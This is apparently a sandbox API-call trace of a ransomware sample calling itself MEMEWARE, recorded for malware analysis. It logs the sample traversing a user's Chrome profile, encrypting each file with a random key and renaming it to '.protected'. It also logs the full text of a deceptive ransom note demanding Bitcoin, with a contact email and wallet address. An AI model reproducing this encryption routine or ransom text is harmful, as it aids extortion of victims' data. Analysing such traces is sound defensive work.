lpNumberOfBytesWritten=0x295e2d4*=0x29, lpOverlapped=0x0) returned 1 [0078.528] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.528] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.528] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.528] CloseHandle (hObject=0x158) returned 1 [0078.528] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001.protected") returned 121 [0078.528] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\manifest-000001"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\manifest-000001.protected")) returned 1 [0078.529] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0078.529] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0078.529] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\RESTORE_FILES.txt") returned 113 [0078.529] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.529] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.529] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0078.530] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.530] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0078.530] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.530] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0078.530] CloseHandle (hObject=0x154) returned 1 [0078.531] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.531] lstrcmpiW (lpString1="Extensions", lpString2="Windows") returned -1 [0078.531] lstrcmpiW (lpString1="Extensions", lpString2="Program Files") returned -1 [0078.531] lstrcmpiW (lpString1="Extensions", lpString2="Program Files (x86)") returned -1 [0078.531] lstrcmpiW (lpString1="Extensions", lpString2="$Recycle.bin") returned 1 [0078.531] lstrcmpiW (lpString1="Extensions", lpString2="System Volume Information") returned -1 [0078.531] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 90 [0078.531] lstrcmpW (lpString1="Extensions", lpString2=".") returned 1 [0078.531] lstrcmpW (lpString1="Extensions", lpString2="..") returned 1 [0078.531] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\*") returned 92 [0078.531] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0078.542] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.542] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.542] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.542] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.542] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.543] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\.") returned 92 [0078.543] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.543] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.543] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.543] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.543] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.543] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.543] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.543] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\..") returned 93 [0078.543] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.543] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.543] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.543] lstrcmpiW (lpString1="aapocclcgogkmnckokdopfmhonfmgoek", lpString2="Windows") returned -1 [0078.543] lstrcmpiW (lpString1="aapocclcgogkmnckokdopfmhonfmgoek", lpString2="Program Files") returned -1 [0078.543] lstrcmpiW (lpString1="aapocclcgogkmnckokdopfmhonfmgoek", lpString2="Program Files (x86)") returned -1 [0078.543] lstrcmpiW (lpString1="aapocclcgogkmnckokdopfmhonfmgoek", lpString2="$Recycle.bin") returned 1 [0078.543] lstrcmpiW (lpString1="aapocclcgogkmnckokdopfmhonfmgoek", lpString2="System Volume Information") returned -1 [0078.543] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek") returned 123 [0078.543] lstrcmpW (lpString1="aapocclcgogkmnckokdopfmhonfmgoek", lpString2=".") returned 1 [0078.543] lstrcmpW (lpString1="aapocclcgogkmnckokdopfmhonfmgoek", lpString2="..") returned 1 [0078.543] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\*") returned 125 [0078.543] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0078.550] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.550] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.550] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.550] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.550] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.550] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\.") returned 125 [0078.550] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.550] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0078.550] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.550] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.550] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.550] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.550] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.550] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\..") returned 126 [0078.550] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.550] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.550] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0078.550] lstrcmpiW (lpString1="0.9_0", lpString2="Windows") returned -1 [0078.550] lstrcmpiW (lpString1="0.9_0", lpString2="Program Files") returned -1 [0078.550] lstrcmpiW (lpString1="0.9_0", lpString2="Program Files (x86)") returned -1 [0078.550] lstrcmpiW (lpString1="0.9_0", lpString2="$Recycle.bin") returned 1 [0078.550] lstrcmpiW (lpString1="0.9_0", lpString2="System Volume Information") returned -1 [0078.550] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned 129 [0078.550] lstrcmpW (lpString1="0.9_0", lpString2=".") returned 1 [0078.550] lstrcmpW (lpString1="0.9_0", lpString2="..") returned 1 [0078.551] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\*") returned 131 [0078.551] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0078.567] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.567] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.567] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.567] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.567] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.567] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\.") returned 131 [0078.567] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.567] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.567] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.567] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.567] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.567] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.567] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.567] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\..") returned 132 [0078.567] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.567] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.567] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.567] lstrcmpiW (lpString1="icon_128.png", lpString2="Windows") returned -1 [0078.567] lstrcmpiW (lpString1="icon_128.png", lpString2="Program Files") returned -1 [0078.567] lstrcmpiW (lpString1="icon_128.png", lpString2="Program Files (x86)") returned -1 [0078.567] lstrcmpiW (lpString1="icon_128.png", lpString2="$Recycle.bin") returned 1 [0078.567] lstrcmpiW (lpString1="icon_128.png", lpString2="System Volume Information") returned -1 [0078.567] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png") returned 142 [0078.567] StrStrIW (lpFirst="icon_128.png", lpSrch=".protected") returned 0x0 [0078.567] lstrcmpW (lpString1="icon_128.png", lpString2="RESTORE_FILES.txt") returned -1 [0078.567] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0078.567] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0078.567] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0078.569] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png") returned 142 [0078.569] StrStrW (lpFirst="icon_128.png", lpSrch=".txt") returned 0x0 [0078.569] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png") returned 142 [0078.569] StrStrW (lpFirst="icon_128.png", lpSrch=".rar") returned 0x0 [0078.569] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png") returned 142 [0078.569] StrStrW (lpFirst="icon_128.png", lpSrch=".zip") returned 0x0 [0078.569] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0xd2c, lpOverlapped=0x0) returned 1 [0078.581] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffff2d4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.581] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xd2c, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0xd2c, lpOverlapped=0x0) returned 1 [0078.581] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.581] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0078.581] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0078.581] CloseHandle (hObject=0x160) returned 1 [0078.582] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.protected") returned 152 [0078.582] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.protected")) returned 1 [0078.583] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.583] lstrcmpiW (lpString1="icon_16.png", lpString2="Windows") returned -1 [0078.583] lstrcmpiW (lpString1="icon_16.png", lpString2="Program Files") returned -1 [0078.583] lstrcmpiW (lpString1="icon_16.png", lpString2="Program Files (x86)") returned -1 [0078.583] lstrcmpiW (lpString1="icon_16.png", lpString2="$Recycle.bin") returned 1 [0078.583] lstrcmpiW (lpString1="icon_16.png", lpString2="System Volume Information") returned -1 [0078.583] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png") returned 141 [0078.583] StrStrIW (lpFirst="icon_16.png", lpSrch=".protected") returned 0x0 [0078.583] lstrcmpW (lpString1="icon_16.png", lpString2="RESTORE_FILES.txt") returned -1 [0078.583] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0078.583] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0078.583] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0078.583] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png") returned 141 [0078.583] StrStrW (lpFirst="icon_16.png", lpSrch=".txt") returned 0x0 [0078.583] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png") returned 141 [0078.583] StrStrW (lpFirst="icon_16.png", lpSrch=".rar") returned 0x0 [0078.583] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png") returned 141 [0078.583] StrStrW (lpFirst="icon_16.png", lpSrch=".zip") returned 0x0 [0078.584] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0xa0, lpOverlapped=0x0) returned 1 [0078.584] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffff60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.584] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0xa0, lpOverlapped=0x0) returned 1 [0078.585] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.585] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0078.585] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0078.585] CloseHandle (hObject=0x160) returned 1 [0078.585] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.protected") returned 151 [0078.585] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.protected")) returned 1 [0078.586] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.586] lstrcmpiW (lpString1="main.html", lpString2="Windows") returned -1 [0078.586] lstrcmpiW (lpString1="main.html", lpString2="Program Files") returned -1 [0078.586] lstrcmpiW (lpString1="main.html", lpString2="Program Files (x86)") returned -1 [0078.586] lstrcmpiW (lpString1="main.html", lpString2="$Recycle.bin") returned 1 [0078.586] lstrcmpiW (lpString1="main.html", lpString2="System Volume Information") returned -1 [0078.586] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html") returned 139 [0078.586] StrStrIW 